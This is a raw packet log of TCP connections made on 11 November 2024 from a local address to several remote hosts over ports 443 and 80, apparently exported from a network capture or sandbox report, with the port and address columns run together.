                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:09.950766087 CET49744443192.168.2.4172.217.16.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:09.950913906 CET49744443192.168.2.4172.217.16.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:09.950948000 CET44349744172.217.16.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:09.950997114 CET49744443192.168.2.4172.217.16.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.235246897 CET49749443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.235307932 CET44349749142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.235390902 CET49749443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.235673904 CET49749443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.235683918 CET44349749142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.542206049 CET44349748142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.542550087 CET49748443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.542572975 CET44349748142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.542959929 CET44349748142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.543020964 CET49748443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.543706894 CET44349748142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.543780088 CET49748443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.544666052 CET49748443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.544730902 CET44349748142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.544835091 CET49748443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.544843912 CET44349748142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.544859886 CET49748443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.587340117 CET44349748142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.592770100 CET49748443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.746592999 CET44349748142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.795622110 CET49748443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.795646906 CET44349748142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.807058096 CET49748443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.807148933 CET44349748142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.807229996 CET49748443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.852575064 CET44349749142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.856013060 CET49749443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.856029034 CET44349749142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.856446981 CET44349749142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.859853029 CET49749443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.859930038 CET44349749142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:10.905006886 CET49749443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.173261881 CET49750443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.173290014 CET44349750184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.173360109 CET49750443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.175025940 CET49750443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.175044060 CET44349750184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.760252953 CET44349750184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.760363102 CET49750443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.761452913 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.761687994 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.763986111 CET49750443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.763998032 CET44349750184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.764254093 CET44349750184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.766320944 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.766570091 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.766644955 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.766789913 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.766827106 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.771619081 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.771651983 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.801996946 CET49750443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.829610109 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.829658985 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.829725027 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.830125093 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.830138922 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.843333960 CET44349750184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.968563080 CET44349750184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.968632936 CET44349750184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.968745947 CET49750443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.968924999 CET49750443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.968945026 CET44349750184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.968955994 CET49750443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.968961954 CET44349750184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.004301071 CET49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.004338980 CET44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.004420042 CET49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.004734993 CET49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.004750967 CET44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.436392069 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.436638117 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.436657906 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.437060118 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.437114000 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.437784910 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.437824011 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.437956095 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.438018084 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.438134909 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.438143969 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.438163042 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.479331970 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.483129025 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.585608006 CET44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.585673094 CET49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.587038040 CET49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.587045908 CET44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.587307930 CET44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.588531971 CET49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.631341934 CET44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.674514055 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.718044996 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.718064070 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.719253063 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.719351053 CET44349754142.250.186.46192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.719405890 CET49754443192.168.2.4142.250.186.46
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.756031036 CET44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.756186962 CET44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.756243944 CET49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.756858110 CET49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.756870985 CET44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.756886959 CET49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.756892920 CET44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.916863918 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.916927099 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.020102978 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.020122051 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.025983095 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.025995016 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.026004076 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.055392981 CET49749443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.716547966 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.716608047 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.805032015 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.809859037 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.941101074 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.941138983 CET44349672173.222.162.32192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:14.499815941 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:14.499939919 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:14.867908955 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:14.873020887 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.237571001 CET49756443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.237608910 CET4434975652.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.237679958 CET49756443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.238848925 CET49756443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.238862038 CET4434975652.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.559767962 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.559835911 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.830007076 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.835490942 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.955810070 CET4434975652.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.955879927 CET49756443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.959041119 CET49756443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.959048033 CET4434975652.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.959284067 CET4434975652.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.999315977 CET49756443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.046894073 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.046962976 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.046968937 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.046982050 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047029018 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047394991 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047406912 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047420979 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047434092 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047442913 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047445059 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047508001 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047508001 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.048896074 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.048908949 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.048921108 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.048932076 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.048937082 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.048959970 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.049019098 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.049031973 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.049122095 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.049122095 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.158976078 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.159063101 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.159205914 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.159219980 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.159277916 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.159853935 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.159874916 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.159920931 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.160231113 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.160243988 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.160281897 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.160312891 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.160661936 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.160675049 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.160717964 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.161417961 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.161432981 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.161442995 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.161497116 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.161497116 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.162339926 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.162353039 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.162446022 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.163592100 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.163606882 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.163616896 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.163645029 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.163686991 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.165287971 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.165302038 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.165333033 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.165368080 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.165884972 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.165899038 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.165983915 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.165983915 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.166078091 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.166095972 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.166109085 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.166134119 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.166134119 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.166173935 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.271219969 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.271287918 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.271339893 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.271405935 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.271429062 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.271477938 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.271796942 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.271811008 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.271836042 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.271868944 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.272511959 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.272525072 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.272583008 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.273008108 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.273020983 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.273108006 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.273108006 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.273715973 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.273727894 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.273776054 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.274490118 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.274503946 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.274513006 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.274590015 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.274590015 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.275260925 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.275278091 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.275289059 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.275319099 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.275333881 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.276067972 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.276081085 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.276125908 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.276171923 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.276839972 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.276853085 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.276896000 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.276909113 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.277586937 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.277600050 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.277651072 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.278347015 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.278359890 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.278398037 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.279136896 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.279150963 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.279164076 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.279191017 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.279217005 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.279910088 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.279923916 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.279972076 CET4975380192.168.2.4185.215.113.206
